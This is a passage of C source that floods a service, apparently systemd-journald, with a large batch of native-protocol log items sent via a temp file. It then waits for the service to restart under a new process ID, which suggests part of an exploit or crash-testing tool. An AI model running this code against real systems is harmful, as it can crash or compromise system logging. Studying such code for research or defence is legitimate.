            size_t i;
            static char buf[1048576];
            const size_t inbuf_n = sizeof(buf) / NATIVE_ITEM_LEN;
            for (i = 0; i < inbuf_n; i++) {
                memcpy(buf + i * NATIVE_ITEM_LEN, NATIVE_ITEM, NATIVE_ITEM_LEN);
            }
            /* Write the items in buffer-sized batches until iovec_n are written. */
            while (iovec_n) {
                const size_t write_n = MIN(iovec_n, inbuf_n);
                xwrite(tempfile.fd, buf, write_n * NATIVE_ITEM_LEN);
                iovec_n -= write_n;
            }
        }
        const int native_fd = open_native_connection();
        send_native_tempfile(native_fd, tempfile);
        if (close(native_fd)) die();
    }
  }

    /* Wait for a running service with a new main PID. */
    TIMED_WHILE (true) {
        usleep(10 * USEC_PER_MSEC);
        const journald_t journald = show_journald();
        if (journald.MainPID <= 0 || journald.MainPID == last_pid) continue;
        last_pid = journald.MainPID;
        sleep_after_restart(journald);
        return;
    }
    die();
}

